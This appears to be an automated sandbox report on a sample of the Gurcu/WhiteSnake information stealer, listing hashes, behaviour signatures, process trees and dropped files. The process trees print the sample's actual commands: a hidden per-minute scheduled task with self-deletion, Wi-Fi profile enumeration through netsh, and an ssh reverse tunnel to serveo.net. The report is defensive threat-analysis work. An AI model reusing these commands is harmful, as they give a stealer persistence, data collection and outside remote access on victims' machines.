Overview

overview

10

Static

static

10

Vfd663501e...50.exe

windows7-x64

10

Vfd663501e...50.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    152s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    14-10-2023 03:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Vfd663501e1ac13eb331505b8388e675450.exe

  • Size

    121KB

  • MD5

    35625d89730f70f12ecdeaf795722865

  • SHA1

    0fedcad5039e3317d0e434bb038b81850e8f3599

  • SHA256

    0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5

  • SHA512

    edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

  • SSDEEP

    3072:qQ2NGg7V7MOrwPRT3KhM9bFcLyoDtfXtRW5FhpAB0H/aAz:aGmg9bFc/p25FJa

Score
10/10
gurcucollectionspywarestealer

Malware Config

Signatures

  • Detect Gurcu Stealer V3 payload 6 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

    stealergurcu
  • Deletes itself 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe
    "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1980
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2472
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:2624
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:2664
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:2420
        • C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
          "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1268
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {A3823695-31D8-4472-9AEF-FFF4FF5F1648} S-1-5-21-3185155662-718608226-894467740-1000:YETUIZPU\Admin:Interactive:[1]
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2484
      • C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
        C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
        2⤵
        • Executes dropped EXE
        • Accesses Microsoft Outlook profiles
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        • outlook_office_path
        • outlook_win_path
        PID:2980
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1652
          • C:\Windows\system32\chcp.com
            chcp 65001
            4⤵
              PID:2040
            • C:\Windows\system32\netsh.exe
              netsh wlan show profiles
              4⤵
                PID:1152
              • C:\Windows\system32\findstr.exe
                findstr /R /C:"[ ]:[ ]"
                4⤵
                  PID:2400
              • C:\Windows\system32\cmd.exe
                "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2364
                • C:\Windows\system32\findstr.exe
                  findstr "SSID BSSID Signal"
                  4⤵
                    PID:936
                  • C:\Windows\system32\netsh.exe
                    netsh wlan show networks mode=bssid
                    4⤵
                      PID:800
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      4⤵
                        PID:2804
                    • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                      "C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7396 serveo.net
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:1064

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll
                  Filesize

                  1.5MB

                  MD5

                  79a6e2268dfdba1d94c27f4b17265ff4

                  SHA1

                  b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                  SHA256

                  6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                  SHA512

                  3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                  Download Submit

                • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                  Filesize

                  914KB

                  MD5

                  d1ce628a81ab779f1e8f7bf7df1bb32c

                  SHA1

                  011c90c704bb4782001d6e6ce1c647bf2bb17e01

                  SHA256

                  2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                  SHA512

                  de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                  Download Submit

                • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                  Filesize

                  914KB

                  MD5

                  d1ce628a81ab779f1e8f7bf7df1bb32c

                  SHA1

                  011c90c704bb4782001d6e6ce1c647bf2bb17e01

                  SHA256

                  2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                  SHA512

                  de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                  Download Submit

                • C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
                  Filesize

                  121KB

                  MD5

                  35625d89730f70f12ecdeaf795722865

                  SHA1

                  0fedcad5039e3317d0e434bb038b81850e8f3599

                  SHA256

                  0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5

                  SHA512

                  edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

                  Download Submit

                • C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
                  Filesize

                  121KB

                  MD5

                  35625d89730f70f12ecdeaf795722865

                  SHA1

                  0fedcad5039e3317d0e434bb038b81850e8f3599

                  SHA256

                  0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5

                  SHA512

                  edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

                  Download Submit

                • C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
                  Filesize

                  121KB

                  MD5

                  35625d89730f70f12ecdeaf795722865

                  SHA1

                  0fedcad5039e3317d0e434bb038b81850e8f3599

                  SHA256

                  0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5

                  SHA512

                  edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

                  Download Submit

                • \Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll
                  Filesize

                  1.5MB

                  MD5

                  79a6e2268dfdba1d94c27f4b17265ff4

                  SHA1

                  b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                  SHA256

                  6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                  SHA512

                  3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                  Download Submit

                • memory/1268-19-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

                  Filesize

                  9.9MB

                  Download

                • memory/1268-18-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

                  Filesize

                  9.9MB

                  Download

                • memory/1980-7-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

                  Filesize

                  9.9MB

                  Download

                • memory/1980-0-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

                  Filesize

                  9.9MB

                  Download

                • memory/1980-4-0x000000001B940000-0x000000001B9C0000-memory.dmp

                  Filesize

                  512KB

                  Download

                • memory/1980-3-0x000000001B940000-0x000000001B9C0000-memory.dmp

                  Filesize

                  512KB

                  Download

                • memory/1980-2-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

                  Filesize

                  9.9MB

                  Download

                • memory/1980-1-0x0000000001030000-0x0000000001054000-memory.dmp

                  Filesize

                  144KB

                  Download

                • memory/2980-13-0x000000001ACE0000-0x000000001AD60000-memory.dmp

                  Filesize

                  512KB

                  Download

                • memory/2980-14-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

                  Filesize

                  9.9MB

                  Download

                • memory/2980-15-0x000000001ACE0000-0x000000001AD60000-memory.dmp

                  Filesize

                  512KB

                  Download

                • memory/2980-12-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

                  Filesize

                  9.9MB

                  Download

                • memory/2980-11-0x0000000000890000-0x00000000008B4000-memory.dmp

                  Filesize

                  144KB

                  Download